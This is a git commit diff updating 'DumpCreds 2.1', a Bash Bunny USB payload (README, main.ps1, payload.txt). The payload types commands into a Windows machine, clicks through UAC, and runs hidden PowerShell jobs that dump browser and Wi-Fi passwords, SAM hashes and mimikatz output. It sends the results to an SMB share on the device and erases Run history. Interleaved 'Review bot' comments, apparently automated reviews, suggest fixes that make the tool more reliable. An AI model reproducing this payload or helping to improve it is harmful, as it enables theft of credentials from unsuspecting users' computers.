Updated DumpCreds for bunny fw v1.1 (#168)

* DumpCreds Version 2.1
- new payload.txt special for BashBunny FW 1.1
- minor changes in main.ps1
- insert some code for debugging

* Updated because new fork sync

* new payload.txt special for BashBunny FW 1.1
+ minor changes in main.ps1
+ insert some code for debugging
pull/187/head
Baur 2017-04-16 08:03:02 +02:00 committed by Sebastian Kinne
parent 7534270a7a
commit 2d651c75f0
3 changed files with 176 additions and 128 deletions


@ -1,22 +1,34 @@
# DumpCreds 2.0 # DumpCreds 2.1
* Author: QDBA * Author: QDBA
* Version: Version 2.0.2 Build 1003 * Version: Version 2.1.0 Build 1004
* Target: Windows * Target: Windows 10
## Description ## Description
** !!!!! works only at Bash Bunny with FW 1.1 !!!!! **
Dumps the usernames & plaintext passwords from Dumps the usernames & plaintext passwords from
- Browsers (Crome, IE, FireFox) * Browsers (Crome, IE, FireFox)
- Wifi * Wifi
- SAM Hashes (only if AdminMode=True) * SAM Hashes (only if AdminMode=True)
- Mimimk@tz Dump (only if AdminMode=True) * Mimimk@tz Dump (only if AdminMode=True)
- Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist) * Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
without without
- Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) * Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
- Internet connection (becaus Firewall ContentFilter Blocks the download sites) * Internet connection (becaus Firewall ContentFilter Blocks the download sites)
# Problems
- if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded.
- If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times)
- If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out.
If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue)
# Debug
If you want some debug information, create a file with name "DEBUG" in the payload folder
you got the debug information in \loot\DumpCred_2.1\log.txt Folder
## Configuration ## Configuration
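Review bot: the new "Problems" and "Debug" sections document the FW 1.1 behaviour but leave two things unclear. The debug note says the output lands in "\loot\DumpCred_2.1\log.txt Folder"; log.txt is a file, not a folder, and the section should say what it contains so users know what they are shipping to loot (payload.txt fills it from a `tail -f /var/log/syslog`, i.e. the whole device syslog, not only this payload's `logger -t DumpCred_2.1` lines). The Problems item on the 1 min 30 s limit should also say which stage the payload was in when it hit it, since "yellow LED blinks very fast" is documented in the STATUS table as "Powershell scripts running", so the time-out here means the target never renamed CON_OK to CON_EOF. Spelling in the same hunk: "Crome" -> "Chrome", "ist" -> "is", "becaus" -> "because", "doesnt" -> "doesn't", "30sfor" -> "30s for", "Your run in a time out" -> "You ran into a timeout", "Thats" -> "That's".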
@ -24,11 +36,6 @@ None needed.
## Requirements ## Requirements
Impacket must be installed.
Install it from tools_installer payload
https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer
## Download ## Download
@ -38,23 +45,45 @@ https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCred
## Install ## Install
Copy payload.txt, main.ps1 and the complete PS Folder to your favorite switch direcrory. 1. Put Bash Bunny in arming mode
2. Coppy All Folders into the root of Bunny Flash Drive
Mandatory
* payloads/library/DumpCreds_2.1 --> the payload Files
* payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload
* tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed)
Not neccessary
* docs --> this doc file
* languages --> languauge files for DUCKY_LANG
3. eject Bash Bunny safely!!
4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed )
5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2
6. eject Bash Bunny safely
7. move switch in right position
8. plugin Bash Bunny and have fun....! :-)
## STATUS ## STATUS
| LED | Status | | LED | Status |
| ------------------ | -------------------------------------------- | | ----------------------- | -------------------------------------------- |
| White | Give drivers some time for installation | | Magenta Solid | Setup |
| Red Blink Fast | Impacket not found | | Red slow blink | Impacket not found |
| Red Blink Slow | Target did not acquire IP address | | Red fast blink | Target did not acquire IP address |
| Amber Blink Fast | Initialization | | Yellow single blink | Initialization |
| Amber | HID Stage | | Yellow double blink | HID Stage |
| Purple Blink Fast | Wait for IP coming up | | Yellow triple blink | Wait for IP coming up |
| Purple Blink Slow | Wait for Handshake (SMBServer Coming up) | | Yellow quad blink | Wait for Handshake (SMBServer Coming up) |
| Purple / Amber | Powershell scripts running | | Yellow very fast blink | Powershell scripts running |
| RED | Error in Powershell Scripts | | White fast blink | Cleanup, copy Files to <root>/loot |
| Green | Finished | | Green | Finished |
| ------------------ | -------------------------------------------- | | ----------------------- | -------------------------------------------- |
## Discussion ## Discussion
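Review bot: the new STATUS table no longer matches the LED legend added to payload.txt in this same commit, and it silently drops the error state. README lists "Yellow quad blink" for the handshake wait and "Yellow very fast blink" for scripts running, while the payload.txt header says "Cyan inv single blink" and "Cyan inv quint blink" for the same stages, and the code actually uses the named stages `LED STAGE4` and `LED Y VERYFAST`; pick one legend and reference it from both files. The old row "RED | Error in Powershell Scripts" was removed without a replacement, so a user who sees a stalled yellow LED has no documented failure state to compare against; either keep an error row or note in "Problems" that script errors are no longer signalled. Also the old and new red rows swap meaning (old: "Red Blink Fast | Impacket not found", new: "Red slow blink | Impacket not found"), which will confuse anyone upgrading from 2.0. Spelling: "direcrory" -> "directory", "Coppy" -> "Copy", "neccessary" -> "necessary", "languauge" -> "language".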
@ -67,13 +96,7 @@ to...... 
https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1
## Changelog
## ToDo - Complete new payload.txt code for BashBunny 1.1
- Added a lot of debug cod into the payload
- paralellize Creds gathering with PS -- check
- while Bashbunny is waiting for Target finished the script it can some other nice work. i.e. nmap the target.
(Not very useful at ths time because I'm still Admin on Computer)
- remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) (and in future)
- rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) -- check
(There is no exploitation. You will not get admin rights, but it passes sucessfully never mind if there is a Credential prompt or a UAC prompt)
- Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain
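Review bot: the Discussion line still credits `Invoke-M1m1k@tz.ps1` as the script taken from the Empire project, but main.ps1 in this commit now launches `$SHARE\PS\invoke-m1m1d0gz.ps1`; update the filename here (or revert the rename in main.ps1) so the documented dependency matches what the payload actually runs. Replacing the "## ToDo" heading with "## Changelog" also deletes the open items (Powersploit modifications, AD information, nmap while waiting) rather than marking them done; keep a ToDo section for the items that are still open and move only the "-- check" ones into the changelog. Typo in the changelog entry: "debug cod" -> "debug code".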


@ -1,7 +1,7 @@
 
<# <#
.SYNOPSIS .SYNOPSIS
DumpCred 2.0 DumpCred 2.1
.DESCRIPTION .DESCRIPTION
Dumps all Creds from a PC Dumps all Creds from a PC
.PARAMETER <paramName> .PARAMETER <paramName>
@ -10,8 +10,8 @@
DumpCred DumpCred
#> #>
$_Version = "2.0.2" $_Version = "2.1.0"
$_BUILD = "1003" $_BUILD = "1004"
# Share on bashbunny # Share on bashbunny
$SHARE="\\172.16.64.1\e" $SHARE="\\172.16.64.1\e"
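Review bot: `$_Version` and `$_BUILD` are maintained by hand in three places (this file, the README's "Version: Version 2.1.0 Build 1004", and payload.txt's "# Build: 1004") and they had already drifted before this commit: README and main.ps1 said Build 1003 while payload.txt said Build 1001. Since payload.txt already passes `$SHARE` to main.ps1 indirectly via the share path, consider writing the version into a file on the share (or documenting payload.txt as the single authoritative source) so the next bump cannot desynchronise them again.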
@ -70,37 +70,42 @@ $LINE3 | Add-Content $TMPFILE
Stop-Job * Stop-Job *
Remove-Job * Remove-Job *
# Start all Jobs as background jobs Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null
if ($isAdmin) { if ($isAdmin) {
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} | Out-Null Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\invoke-m1m1d0gz.ps1} -ErrorAction SilentlyContinue | Out-Null
} }
Write-host "... Wait for end of jobs"
# Wait for all jobs # Wait for all jobs
Get-Job | Wait-Job | Out-Null Get-Job | Wait-Job
Write-host "... Receiving results"
# Receive all results # Receive all results
Get-Job | Receive-Job | Out-File -Append $TMPFILE Get-Job | Receive-Job | Out-File -Append $TMPFILE
#Move TMP File to Bunny #Move TMP File to Bunny
Write-host "Moving file to bunny"
move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue
# Cleanup # Cleanup
# Remove Run History # Remove Run History
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
Write-host "... Rename CON_OK to CON_EOF"
# Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished # Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished
Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF" Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF"
# Kill cmd.exe Write-host "... Kill cmds"
# Kill cmde.exe
Stop-Process -name cmd -ErrorAction SilentlyContinue Stop-Process -name cmd -ErrorAction SilentlyContinue
Write-host "... Remove all Jobs"
# Remove all Jobs from Joblist # Remove all Jobs from Joblist
Remove-Job * Remove-Job *
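Review bot: the `-ErrorAction SilentlyContinue` appended to each `start-job` only suppresses errors raised by Start-Job itself (bad parameters, job infrastructure); anything thrown inside the script block, or by the child `powershell -Exec Bypass ...` process, still happens inside the job and only surfaces through `Receive-Job`, so this change does not affect the errors that actually reach `$TMPFILE`. Dropping `| Out-Null` from `Get-Job | Wait-Job` means the job objects are now written to the success stream, which in the debug path of payload.txt (`1> %TEMP%\pslog.tmp`) mixes job listings into the log. `Wait-Job` is also called without `-Timeout`: a single hung child (the `-RunAs32` Firefox job is the most likely candidate) blocks the run until the Bunny-side 1 min 30 s limit that the README documents, and CON_OK is then never renamed to CON_EOF. Suggest `Get-Job | Wait-Job -Timeout 60 | Out-Null` followed by `Get-Job | Where-Object State -ne 'Completed' | Stop-Job` before `Receive-Job`, so a stuck job is reported rather than stalling the handshake. Comment typo: "# Kill cmde.exe" -> "# Kill cmd.exe".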


@ -1,79 +1,84 @@
#!/bin/bash #!/bin/bash
# #
# Title: DumpCreds 2.0 # Title: DumpCreds 2.1
# Author: QDBA # Author: QDBA
# Version: 2.0.2 # Version: 2.1.0
# Build: 1001 # Build: 1004
# Category: Exfiltration # Category: Exfiltration
# Target: Windows Windows 7 + 10 (Powershell) # Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet # Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
# #
# #
# White................Wait for driver installation # LED Status
# Red Blink Fast.......Impacket not found # ----------------------- + --------------------------------------------
# Red Blink Slow.......Target did not acquire IP address # SETUP + Setup
# Amber Blink Fast.....Initialization # FAIL + No /tools/impacket/examples/smbserver.py found
# Amber................HID Stage # FAIL2 + Target did not acquire IP address
# Purple Blink Fast....Wait for IP coming up # Yellow single blink + Initialization
# Purple Blink Slow....Wait for Handshake (SMB Server Coming up) # Yellow double blink + HID Stage
# Purple / Amber ......Powershell scripts running # Yellow triple blink + Wait for IP coming up
# RED..................Error in Powershell scripts # Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Green................Finished # Cyan inv quint blink + Powershell scripts running
# # White fast blink + Cleanup, copy Files to <root>/loot
# OPTIONS # Green + Finished
# ----------------------- + --------------------------------------------
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
###### Lets Start ####
LED SETUP
# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh
# Some Variables # Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTDIR=$SWITCHDIR/loot LOOTDIR=$SWITCHDIR/loot
mkdir -p $LOOTDIR >/dev/null
# if the file DEBUG in payload folder exist, enter debug mode
# Initialization if [ -f $SWITCHDIR/DEBUG ];then
LED R G 100 DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
# Check for impacket. If not found, blink fast red. DEBUG=0
if [ ! -f pentest/impacket/examples/smbserver.py ]; then
LED R 100
exit 1
fi fi
mkdir -p $LOOTDIR
REQUIRETOOL impacket
# remove old Handshake Files # remove old Handshake Files
rm -f $SWITCHDIR/CON_* rm -f $SWITCHDIR/CON_*
# HID STAGE # HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. # Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
LED R G B logger -t DumpCred_2.1 "### Enter HID Stage ###"
LED STAGE1
ATTACKMODE HID ATTACKMODE HID
Q SET_LANGUAGE DE export DUCKY_LANG=de
# Give some time for driver installation Q DELAY 5000
Q DELAY 25000
LED R G 100
# Launch initial cmd # Launch initial cmd
Q GUI r if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi
# Launch powershell as admin (red window)
Q DELAY 1000 Q DELAY 1000
Q STRING cmd /k mode con lines=1 cols=180 if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500 Q DELAY 500
Q ENTER Q ENTER
# Launch powershell as admin and deletes Run history # Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
#Q GUI r
Q DELAY 1000
#Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=180' -Verb runAs"
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/k mode con lines=1 cols=180' -Verb runAs"
Q DELAY 500
Q ENTER
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline # With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows. # now the second powershell command goes to the admin cmd windows.
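Review bot: the new `# OPTIONS` header is empty while the settings a user would actually need to change are hard-coded further down: `export DUCKY_LANG=de`, and the keyboard-layout-specific `ALT j` / `ALT n` keystrokes that the comment at "Bypass UAC ::" tells the user to edit by hand. Move `DUCKY_LANG` and the two accelerator keys into OPTIONS as variables so the comment can point at one place. `mkdir -p $LOOTDIR >/dev/null` and the later `mkdir -p $LOOTDIR` do the same thing; keep one. In debug mode `tail -f /var/log/syslog > /tmp/log.txt &` captures the whole device syslog and its PID is discarded; save it (`TAILPID=$!`) so the cleanup at the end can kill exactly that process instead of `killall tail`. The line "# Bypass UAC :: Change "ALT j" according to your language..." appears twice in the new file; delete the duplicate.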
@ -90,59 +95,74 @@ Q ALT n
Q DELAY 500 Q DELAY 500
Q ENTER Q ENTER
LED R G LED STAGE2
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script # Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500 Q DELAY 500
if [ $DEBUG -eq 1 ]; then
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\""
else
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
fi
Q DELAY 1000 Q DELAY 1000
Q ENTER Q ENTER
logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage # Ethernet Tage
LED R B 1 LED STAGE3
ATTACKMODE RNDIS_ETHERNET ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables # Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh
logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server # Start SMB Server
/pentest/impacket/examples/smbserver.py e $SWITCHDIR & /tools/impacket/examples/smbserver.py e $SWITCHDIR &
# Give target a chance to start exfiltration # Give target a chance to start exfiltration
sleep 2 sleep 2
# Here you can do anything else except but do not change the ATTACKMODE or umount /root/udisk GET TARGET_IP
# Check target IP address. If unset, blink slow red. # Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then if [ -z "${TARGET_IP}" ]; then
LED R 1000 LED FAIL2
exit 1 logger -t DumpCred_2.1 "### No Target_IP ###"
logger -t DumpCred_2.1 "### Failed ###"
exit
fi fi
logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###"
LED R B 1000 LED STAGE4
# Handshake Bunny and Computer # Handshake Bunny and Computer
while ! [ -f $SWITCHDIR/CON_REQ ]; do while ! [ -f $SWITCHDIR/CON_REQ ]; do
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###"
sleep 1 sleep 1
done done
mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK
LED R B
LED Y VERYFAST
# Wait until CON_EOF - Computer set it if all is ready # Wait until CON_EOF - Computer set it if all is ready
while ! [ -f $SWITCHDIR/CON_EOF ]; do while ! [ -f $SWITCHDIR/CON_EOF ]; do
LED R B logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###"
sleep 1 sleep 2
LED R G
sleep 1
if [ -f $SWITCHDIR/CON_ERR ]; then
rm $SWITCHDIR/CON_ERR
LED R
exit 2
fi
done done
rm $SWITCHDIR/CON_EOF
sync; sleep 1; sync
LED G LED CLEANUP
# Cleanup
logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF
logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################"
# realy the end....
if [ $DEBUG -eq 1 ]; then
killall tail
cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/
fi
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH
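Review bot: the debug branch of the HID command is broken in two ways compared with the non-debug branch right below it. It omits the trailing `; exit` inside the `while (1)` loop, so after main.ps1 returns the loop pings 172.16.64.1 again and re-runs main.ps1 indefinitely; and `9>` is not a PowerShell redirection operator (only streams 1 to 6 and `*` exist), so the command does not parse as written. Use the same `...main.ps1 *> %TEMP%\pslog.tmp; exit` form in both branches. Second, the old CON_EOF loop checked for `CON_ERR` and left with `exit 2`; the new loop only logs and sleeps, and neither the CON_REQ nor the CON_EOF loop has an upper bound, so any failure on the target side now ends only when the firmware kills the payload at the 1 min 30 s limit the README describes, with no `LED FAIL` state to tell the user why. Reinstate the CON_ERR check and give both loops a counter with a distinct FAIL LED. Minor: `exit` after `LED FAIL2` drops the non-zero status the old `exit 1` had, `killall tail` kills every tail on the device rather than the one started in debug mode, and "# Ethernet Tage" should read "# Ethernet Stage".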